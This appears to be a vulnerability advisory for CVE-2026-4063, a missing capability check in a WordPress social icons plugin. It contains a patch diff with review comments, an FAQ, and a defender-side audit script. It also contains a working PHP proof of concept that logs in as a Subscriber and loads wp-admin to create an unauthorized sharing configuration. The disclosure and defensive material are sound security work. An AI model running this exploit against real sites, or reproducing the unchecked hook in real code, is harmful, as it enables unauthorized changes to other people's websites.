Atomic Edge analysis of CVE-2026-4063:
The vulnerability exists in the Social Icons Widget & Block plugin for WordPress, versions up to and including 4.5.8. The root cause is a missing capability check in the add_menu_item() method of the WPZOOM_Social_Sharing_Buttons class. This method is hooked to the admin_menu action and calls wp_insert_post() and update_post_meta() to create a wpzoom-sharing configuration post, without verifying that the current user has administrator-level capabilities before performing these operations.

The attack vector requires an authenticated user with Subscriber-level access or higher. The admin_menu hook fires whenever any WordPress admin page loads, so loading one is enough to trigger the method. When triggered, the method creates a published wpzoom-sharing configuration post with default sharing button settings, which automatically activates social sharing buttons on all post content via the the_content filter.

The patch adds a capability check at the beginning of the add_menu_item() method in class-wpzoom-social-sharing-buttons.php, requiring the current user to have the manage_options capability. This restricts configuration creation to administrators only.

Atomic Edge research confirms that exploitation causes unwanted social sharing buttons to appear on all frontend posts, potentially disrupting site appearance and user experience.

CVE-2026-4063: Social Icons Widget & Block <= 4.5.8 – Missing Authorization to Authenticated (Subscriber+) Sharing Configuration Creation (social-icons-widget-by-wpzoom)
CVE ID: CVE-2026-4063
Affected versions: <= 4.5.8
Patched version: 4.5.9
Analysis Overview
Differential between vulnerable and patched code
--- a/social-icons-widget-by-wpzoom/elementor/wpzoom-social-icons-elementor.php
+++ b/social-icons-widget-by-wpzoom/elementor/wpzoom-social-icons-elementor.php
@@ -123,6 +123,7 @@
wp_enqueue_style(
'wpzoom-social-icons-elementor',
WPZOOM_SOCIAL_ICONS_PLUGIN_URL . 'elementor/assets/css/wpzoom-social-icons-elementor.css',
+ array(),
WPZOOM_SOCIAL_ICONS_PLUGIN_VERSION
);
}
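Review bot: this hunk is an unrelated bug fix bundled into the security release and should be called out as such in the changelog. In wp_enqueue_style() the third argument is $deps and the fourth is $ver; before this change WPZOOM_SOCIAL_ICONS_PLUGIN_VERSION was sitting in the $deps slot, so no version string was being appended to the stylesheet URL and cache busting on upgrade did not work. Inserting `array(),` restores the correct argument order.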
--- a/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-sharing-buttons-notice.php
+++ b/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-sharing-buttons-notice.php
@@ -2,7 +2,7 @@
/**
* Sharing Buttons Admin Notice
*
- * Displays a dismissible notice on the dashboard promoting the sharing buttons feature.
+ * Registers the sharing buttons notice with WPZOOM Notice Center when available.
*
* @package WPZOOM_Social_Icons
*/
@@ -18,75 +18,21 @@
class WPZOOM_Sharing_Buttons_Notice {
/**
- * The single class instance.
- *
- * @var $instance
- */
- private static $instance = null;
-
- /**
- * Notice dismiss key
+ * Notice ID for Notice Center
*
* @var string
*/
- private $dismiss_key = 'wpzoom_sharing_buttons_notice_dismissed';
-
- /**
- * Main Instance
- */
- public static function get_instance() {
- if ( is_null( self::$instance ) ) {
- self::$instance = new self();
- }
- return self::$instance;
- }
+ const NOTICE_ID = 'wpzoom_sharing_buttons';
/**
* Constructor.
*/
public function __construct() {
- add_action( 'admin_notices', array( $this, 'display_notice' ) );
- add_action( 'wp_ajax_wpzoom_dismiss_sharing_notice', array( $this, 'dismiss_notice' ) );
- add_action( 'admin_enqueue_scripts', array( $this, 'enqueue_scripts' ) );
+ add_filter( 'wpzoom_notice_center_notices', array( $this, 'register_notice_center' ) );
}
/**
- * Check if notice should be displayed
- *
- * @return bool
- */
- private function should_display_notice() {
- // Only show to admins.
- if ( ! current_user_can( 'manage_options' ) ) {
- return false;
- }
-
- // Check if dismissed.
- if ( get_user_meta( get_current_user_id(), $this->dismiss_key, true ) ) {
- return false;
- }
-
- // Only show on dashboard or plugin pages.
- $screen = get_current_screen();
- if ( ! $screen ) {
- return false;
- }
-
- $allowed_screens = array(
- 'dashboard',
- 'plugins',
- 'edit-wpzoom-shortcode',
- );
-
- if ( ! in_array( $screen->id, $allowed_screens, true ) ) {
- return false;
- }
-
- return true;
- }
-
- /**
- * Get the sharing config edit URL
+ * Get the sharing config edit URL.
*
* @return string|false
*/
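Review bot: deleting should_display_notice() removes the `current_user_can( 'manage_options' )`, per-user dismissal and screen checks from this class entirely, so from here on the notice is only as well gated as WPZOOM_Notice_Center's handling of whatever keys this class hands it; that code is not in the diff, so the reviewer cannot confirm enforcement from these hunks alone. Separately, the get_instance() singleton is removed while the constructor still registers a filter, so each construction adds another callback; the require_once at the bottom of the main plugin file is the only thing preventing duplicates, which is worth a comment.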
@@ -107,158 +53,63 @@
}
/**
- * Display the admin notice
+ * Register the sharing buttons notice with WPZOOM Notice Center.
+ *
+ * @param array $notices Existing notices from the filter.
+ * @return array Notices with sharing notice added when applicable.
*/
- public function display_notice() {
- if ( ! $this->should_display_notice() ) {
- return;
+ public function register_notice_center( $notices ) {
+ if ( ! is_array( $notices ) ) {
+ $notices = array();
}
$configure_url = $this->get_sharing_config_url();
- // If no config exists yet, don't show the notice.
+ // Only show when at least one sharing config exists.
if ( ! $configure_url ) {
- return;
+ return $notices;
}
- $nonce = wp_create_nonce( 'wpzoom_dismiss_sharing_notice' );
- ?>
- <div class="notice notice-info is-dismissible wpzoom-sharing-notice" data-nonce="<?php echo esc_attr( $nonce ); ?>">
- <div class="wpzoom-sharing-notice-content">
- <div class="wpzoom-sharing-notice-icon">
- <svg width="40" height="40" viewBox="0 0 24 24" fill="#3496ff">
- <path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81 1.66 0 3-1.34 3-3s-1.34-3-3-3-3 1.34-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9c-1.66 0-3 1.34-3 3s1.34 3 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.16c-.05.21-.08.43-.08.65 0 1.61 1.31 2.92 2.92 2.92s2.92-1.31 2.92-2.92-1.31-2.92-2.92-2.92z"/>
- </svg>
- </div>
- <div class="wpzoom-sharing-notice-text">
- <h3><?php esc_html_e( 'Add Social Sharing Buttons to Your Posts', 'social-icons-widget-by-wpzoom' ); ?></h3>
- <p><?php esc_html_e( 'Let your visitors share your content on social media! Enable sharing buttons that appear automatically on all your posts and pages.', 'social-icons-widget-by-wpzoom' ); ?></p>
- <p class="wpzoom-sharing-notice-pro-hint">
- <?php
- printf(
- /* translators: %s: upgrade link */
- esc_html__( 'Want more? %s adds AI Share Buttons, Like Button, Share Counts & Analytics.', 'social-icons-widget-by-wpzoom' ),
- '<a href="https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice" target="_blank"><strong>' . esc_html__( 'PRO', 'social-icons-widget-by-wpzoom' ) . '</strong></a>'
- );
- ?>
- </p>
- <div class="wpzoom-sharing-notice-actions">
- <a href="<?php echo esc_url( $configure_url ); ?>" class="button wpzoom-sharing-btn-primary">
- <?php esc_html_e( 'Configure Sharing Buttons', 'social-icons-widget-by-wpzoom' ); ?>
- </a>
- <a href="https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice-btn" class="button wpzoom-sharing-btn-upgrade" target="_blank">
- <span class="dashicons dashicons-star-filled" style="font-size: 16px; line-height: 28px; width: 16px; height: 16px; margin-right: 3px;"></span>
- <?php esc_html_e( 'Upgrade to Pro', 'social-icons-widget-by-wpzoom' ); ?>
- </a>
- </div>
- </div>
- </div>
- </div>
- <?php
- }
+ $pro_url = 'https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice-btn';
- /**
- * Enqueue scripts and styles for the notice
- *
- * @param string $hook Current admin page.
- */
- public function enqueue_scripts( $hook ) {
- if ( ! $this->should_display_notice() ) {
- return;
- }
+ $content = '<p>' . esc_html__( 'Let your visitors share your content on social media! Enable sharing buttons that appear automatically on all your posts and pages.', 'social-icons-widget-by-wpzoom' ) . '</p>';
+ $content .= '<p>';
+ $content .= sprintf(
+ /* translators: %s: upgrade link */
+ esc_html__( 'Want more? %s adds AI Share Buttons, Like Button, Share Counts & Analytics.', 'social-icons-widget-by-wpzoom' ),
+ '<a href="https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice" target="_blank" rel="noopener noreferrer"><strong>' . esc_html__( 'PRO', 'social-icons-widget-by-wpzoom' ) . '</strong></a>'
+ );
+ $content .= '</p>';
- wp_add_inline_style( 'common', '
- .wpzoom-sharing-notice {
- padding: 0 !important;
- border-left-color: #3496ff !important;
- }
- .wpzoom-sharing-notice-content {
- display: flex;
- align-items: center;
- padding: 15px 30px 15px 12px;
- gap: 15px;
- }
- .wpzoom-sharing-notice-icon {
- flex-shrink: 0;
- }
- .wpzoom-sharing-notice-text {
- flex: 1;
- }
- .wpzoom-sharing-notice-text h3 {
- margin: 0 0 5px 0;
- font-size: 14px;
- }
- .wpzoom-sharing-notice-text p {
- margin: 0;
- color: #50575e;
- }
- .wpzoom-sharing-notice-pro-hint {
- margin-top: 6px !important;
- font-size: 12px;
- color: #888 !important;
- }
- .wpzoom-sharing-notice-pro-hint a {
- color: #3496ff;
- text-decoration: none;
- }
- .wpzoom-sharing-notice-actions {
- display: flex;
- gap: 8px;
- margin-top: 10px;
- }
- .wpzoom-sharing-btn-primary.button {
- background: #1a1a1a !important;
- color: #fff !important;
- border-color: #1a1a1a !important;
- border-radius: 4px;
- }
- .wpzoom-sharing-btn-primary.button:hover {
- background: #3496ff !important;
- border-color: #3496ff !important;
- }
- .wpzoom-sharing-btn-upgrade.button {
- border-color: #1a1a1a !important;
- color: #1a1a1a !important;
- border-radius: 4px;
- }
- .wpzoom-sharing-btn-upgrade.button:hover {
- background: #3496ff !important;
- border-color: #3496ff !important;
- color: #fff !important;
- }
- @media (max-width: 782px) {
- .wpzoom-sharing-notice-content {
- flex-wrap: wrap;
- }
- .wpzoom-sharing-notice-actions {
- width: 100%;
- margin-top: 10px;
- }
- }
- ' );
-
- wp_add_inline_script( 'common', '
- jQuery(document).ready(function($) {
- $(".wpzoom-sharing-notice").on("click", ".notice-dismiss", function() {
- var $notice = $(this).closest(".wpzoom-sharing-notice");
- $.post(ajaxurl, {
- action: "wpzoom_dismiss_sharing_notice",
- nonce: $notice.data("nonce")
- });
- });
- });
- ' );
- }
+ $notices[] = array(
+ 'id' => self::NOTICE_ID,
+ 'heading' => __( 'Add Social Sharing Buttons to Your Posts', 'social-icons-widget-by-wpzoom' ),
+ 'content' => $content,
+ 'icon' => array(
+ 'type' => 'dashicon',
+ 'src' => '',
+ 'dashicon' => 'dashicons-share',
+ 'color' => '#3496ff',
+ 'background_color' => '',
+ ),
+ 'primary_button' => array(
+ 'label' => __( 'Configure Sharing Buttons', 'social-icons-widget-by-wpzoom' ),
+ 'url' => $configure_url,
+ 'new_tab' => false,
+ ),
+ 'secondary_button' => array(
+ 'label' => __( 'Upgrade to Pro', 'social-icons-widget-by-wpzoom' ),
+ 'url' => $pro_url,
+ 'new_tab' => true,
+ ),
+ 'capability' => 'manage_options',
+ 'screens' => array( 'dashboard', 'plugins', 'edit-wpzoom-shortcode' ),
+ 'source' => 'Social Icons & Sharing',
+ 'priority' => 15,
+ );
- /**
- * AJAX handler to dismiss notice
- */
- public function dismiss_notice() {
- check_ajax_referer( 'wpzoom_dismiss_sharing_notice', 'nonce' );
- update_user_meta( get_current_user_id(), $this->dismiss_key, true );
- wp_die();
+ return $notices;
}
}
-// Initialize the class.
-WPZOOM_Sharing_Buttons_Notice::get_instance();
+new WPZOOM_Sharing_Buttons_Notice();
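Review bot: the old per-user dismissal flag `wpzoom_sharing_buttons_notice_dismissed` is no longer read anywhere in this file, so administrators who dismissed the previous notice will see it again unless Notice Center persists its own dismissal state under NOTICE_ID; either migrate that user meta or document the reset. The added `rel="noopener noreferrer"` on the PRO link is the right companion to `target="_blank"`; the secondary button is now rendered by Notice Center from `'new_tab' => true`, so check that it applies the same attribute, since that markup is no longer under this class's control. The `'capability' => 'manage_options'` and `'screens'` entries are the replacement for the removed checks; a one-line comment saying so would save the next reader a diff archaeology session.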
--- a/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-social-sharing-buttons.php
+++ b/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-social-sharing-buttons.php
@@ -108,6 +108,11 @@
* Add menu item
*/
public function add_menu_item() {
+ // Only administrators should be able to create/manage sharing configuration.
+ if ( ! current_user_can( 'manage_options' ) ) {
+ return;
+ }
+
$parent_slug = 'edit.php?post_type=wpzoom-shortcode';
// Check if there's an existing configuration
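Review bot: this is the actual fix for CVE-2026-4063 and the early return is correct as far as it goes, but it only gates on capability; the underlying design, creating a published wpzoom-sharing post via wp_insert_post() and update_post_meta() as a side effect of the admin_menu callback, is unchanged, so any administrator's first admin page load still silently enables sharing buttons site-wide. Consider moving configuration creation to an explicit, nonce-protected action (or to plugin activation) and leaving add_menu_item() to register the submenu only, and add a test asserting that running admin_menu as a Subscriber creates no wpzoom-sharing post.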
@@ -505,4 +510,4 @@
}
// Initialize the class
-WPZOOM_Social_Sharing_Buttons::get_instance();
No newline at end of file
+WPZOOM_Social_Sharing_Buttons::get_instance();
--- a/social-icons-widget-by-wpzoom/social-icons-widget-by-wpzoom.php
+++ b/social-icons-widget-by-wpzoom/social-icons-widget-by-wpzoom.php
@@ -3,14 +3,14 @@
* Plugin Name: Social Icons & Sharing Buttons by WPZOOM
* Plugin URI: https://www.wpzoom.com/plugins/social-share/
* Description: Add Social Icons and Share Buttons to your website easily. Link to your social media profiles or let visitors share your content on popular networks. Supports over 400 social media icons, customizable colors, and drag-and-drop sorting.
- * Version: 4.5.8
+ * Version: 4.5.9
* Author: WPZOOM
* Author URI: https://www.wpzoom.com/
* Text Domain: social-icons-widget-by-wpzoom
* License: GNU General Public License v2.0 or later
* License URI: http://www.gnu.org/licenses/gpl-2.0.txt
* Requires at least: 6.5
- * Tested up to: 6.9
+ * Tested up to: 7.0
*
* @package WPZOOM_Social_Icons
*/
@@ -45,6 +45,18 @@
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-social-icons-shortcode.php';
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-share-analytics-upsell.php';
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-floating-buttons-upsell.php';
+
+// WPZOOM Notice Center (submodule at includes/notice-center).
+$wpz_notice_center_path = WPZOOM_SOCIAL_ICONS_PLUGIN_PATH . 'includes/notice-center/';
+$wpz_notice_center_url = WPZOOM_SOCIAL_ICONS_PLUGIN_URL . 'includes/notice-center/';
+if ( is_admin() && ! class_exists( 'WPZOOM_Notice_Center' ) && file_exists( $wpz_notice_center_path . 'notice-center.php' ) ) {
+ require_once $wpz_notice_center_path . 'notice-center.php';
+ WPZOOM_Notice_Center::get_instance()->set_assets( array(
+ 'css_url' => $wpz_notice_center_url . 'assets/notice-center.css',
+ 'js_url' => $wpz_notice_center_url . 'assets/notice-center.js',
+ ) );
+}
+
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-sharing-buttons-notice.php';
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-social-icons-upsell.php';
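Review bot: WPZOOM_SOCIAL_ICONS_PLUGIN_PATH and WPZOOM_SOCIAL_ICONS_PLUGIN_URL must already be defined when this block runs, and the hunk does not show where; confirm their define() precedes line 45. The `! class_exists( 'WPZOOM_Notice_Center' )` guard means that when another WPZOOM plugin has already loaded Notice Center, set_assets() is skipped and this plugin's notice renders with that plugin's assets, which only works if the submodule versions stay in lockstep across the plugin family. `$wpz_notice_center_path` and `$wpz_notice_center_url` are plain globals because this file executes in global scope; unset() them after use or wrap the block in a function. The file_exists() check is a good defensive touch for installs where the submodule was not checked out.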
Proof of Concept (PHP)
NOTICE:
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4063 - Social Icons Widget & Block <= 4.5.8 - Missing Authorization to Authenticated (Subscriber+) Sharing Configuration Creation

// Configure target WordPress site
$target_url = 'http://target-wordpress-site.com';
$username = 'subscriber';
$password = 'password';

// Step 1: Authenticate as subscriber
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

// Create cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login page to obtain nonce
$response = curl_exec($ch);
preg_match('/name="log"[^>]+value="([^"]*)"/', $response, $log_matches);
preg_match('/name="pwd"[^>]+value="([^"]*)"/', $response, $pwd_matches);
preg_match('/name="wp-submit"[^>]+value="([^"]*)"/', $response, $submit_matches);

// Prepare POST data for login
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => $submit_matches[1] ?? 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));

// Execute login
$response = curl_exec($ch);

// Step 2: Trigger admin_menu hook execution by accessing any admin page
// The add_menu_item() method will execute and create the sharing configuration
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Check if configuration was created
if (strpos($response, 'wpzoom-sharing') !== false || strpos($response, 'sharing') !== false) {
    echo "Success: Sharing configuration likely created. Social buttons will appear on all posts.\n";
} else {
    echo "Configuration may have been created. Verify by checking frontend posts for social sharing buttons.\n";
}

curl_close($ch);
unlink('cookies.txt');
?>
Frequently Asked Questions
What is CVE-2026-4063?
Overview of the vulnerability
CVE-2026-4063 is a medium-severity vulnerability in the Social Icons Widget & Block plugin for WordPress, specifically in versions up to and including 4.5.8. It allows authenticated users with Subscriber-level access or higher to create unauthorized sharing configurations, which can lead to unwanted social sharing buttons being injected into all post content.

How does CVE-2026-4063 work?
Mechanism of exploitation
The vulnerability arises from a missing capability check in the add_menu_item() method of the plugin. This method allows users to trigger the creation of a wpzoom-sharing configuration post without verifying if the user has administrator-level capabilities, enabling unauthorized modifications.

Who is affected by this vulnerability?
Identifying vulnerable users and systems
Any WordPress site using the Social Icons Widget & Block plugin version 4.5.8 or earlier is affected. Specifically, authenticated users with Subscriber-level access and above can exploit this vulnerability.

How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Social Icons Widget & Block plugin installed. If it is version 4.5.8 or earlier, your site is at risk. Additionally, review user roles to see if any authenticated users have Subscriber-level access.

How can I fix CVE-2026-4063?
Updating the plugin
The vulnerability is patched in version 4.5.9 of the Social Icons Widget & Block plugin. Updating to this version will resolve the issue by adding the necessary capability check to restrict configuration creation to administrators only.

What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider temporarily disabling the plugin to prevent exploitation. Additionally, review user roles and permissions to limit access to only trusted users until the plugin can be updated.

What does a CVSS score of 4.3 mean?
Understanding severity ratings
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that could lead to unauthorized actions on the site, especially if exploited by authenticated users.

What practical risks does this vulnerability pose?
Impact on site functionality
Exploitation of this vulnerability can lead to unwanted social sharing buttons being added to all posts, which may disrupt the site's appearance and user experience. This could affect user engagement and the overall aesthetic of the site.

How does the proof of concept demonstrate the issue?
Understanding the exploit
The proof of concept provided illustrates how an authenticated user can log in and trigger the creation of a sharing configuration post without proper authorization checks. This demonstrates the ease with which the vulnerability can be exploited.

What are the implications of unauthorized data modification?
Consequences of exploitation
Unauthorized data modification can lead to a range of issues, including the injection of unwanted content, potential data integrity problems, and a negative impact on user trust. It can also create additional vulnerabilities if exploited further.

Is there a way to monitor for exploitation attempts?
Detecting potential attacks
To monitor for exploitation attempts, consider implementing security plugins that log user actions and changes made to posts. Regularly reviewing logs can help identify unauthorized access or changes.

What should I do if I suspect my site has been compromised?
Response to potential breaches
If you suspect your site has been compromised, immediately change passwords for all user accounts, review user roles, and check for any unauthorized changes or content. It is also advisable to conduct a full security audit and consider restoring from a backup.
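As an added defender-side example (not code from the Atomic Edge page or from the WPZOOM plugin), the following WP-CLI script turns the analysis above and the two answers on monitoring and suspected compromise into concrete checks: whether the installed version still lacks the manage_options check, and whether any wpzoom-sharing configuration post was authored by an account that could not legitimately have created one. It assumes the plugin does not pass an explicit post_author to wp_insert_post(), so the post records the user whose admin page load triggered add_menu_item(); the script file name is yours to choose.

```php
<?php
// Added audit example for CVE-2026-4063; not code from the Atomic Edge page or
// the WPZOOM plugin. Run on the site under review with `wp eval-file <this file>`.
// Assumption: add_menu_item() passes no explicit post_author, so wp_insert_post()
// records the user whose admin page load triggered it; a wpzoom-sharing post
// authored by a non-administrator can then only have come from the unpatched path.

/**
 * Return every wpzoom-sharing configuration post whose author cannot
 * manage_options (or no longer exists). Administrator-authored posts are the
 * expected case and are not reported.
 */
function wpz_cve_2026_4063_audit_sharing_configs() {
    $findings = array();
    $configs  = get_posts( array(
        'post_type'     => 'wpzoom-sharing',
        'post_status'   => 'any',   // include drafts/trash, not only published
        'numberposts'   => -1,
        'no_found_rows' => true,
    ) );

    foreach ( $configs as $config ) {
        $author_id = (int) $config->post_author;
        $author    = get_userdata( $author_id );
        if ( $author && user_can( $author, 'manage_options' ) ) {
            continue; // created by an administrator: expected behaviour
        }
        $findings[] = array(
            'post_id'     => $config->ID,
            'status'      => $config->post_status,
            'created_gmt' => $config->post_date_gmt,
            'author_id'   => $author_id,
            'author'      => $author ? $author->user_login : '(deleted user)',
            'roles'       => $author ? $author->roles : array(),
        );
    }
    return $findings;
}

/**
 * True when the installed version is below 4.5.9, the release that adds the
 * manage_options check. Uses the main plugin file path shown in the diff.
 */
function wpz_cve_2026_4063_plugin_is_vulnerable() {
    $file = WP_PLUGIN_DIR . '/social-icons-widget-by-wpzoom/social-icons-widget-by-wpzoom.php';
    if ( ! file_exists( $file ) ) {
        return false; // plugin not installed
    }
    $data = get_file_data( $file, array( 'Version' => 'Version' ) );
    return version_compare( $data['Version'], '4.5.9', '<' );
}

if ( defined( 'WP_CLI' ) && WP_CLI ) {
    WP_CLI::log( wpz_cve_2026_4063_plugin_is_vulnerable()
        ? 'Installed version is below 4.5.9: vulnerable, update the plugin.'
        : 'Plugin is patched (>= 4.5.9) or not installed.' );
    foreach ( wpz_cve_2026_4063_audit_sharing_configs() as $f ) {
        WP_CLI::warning( sprintf( 'wpzoom-sharing post #%d (%s) created %s by %s (roles: %s)',
            $f['post_id'], $f['status'], $f['created_gmt'], $f['author'], implode( ',', $f['roles'] ) ) );
    }
}
```

A finding is a starting point for the log review the answers above recommend, not proof on its own: correlate the post's created_gmt with the flagged account's login and wp-admin access records before deciding how the configuration got there.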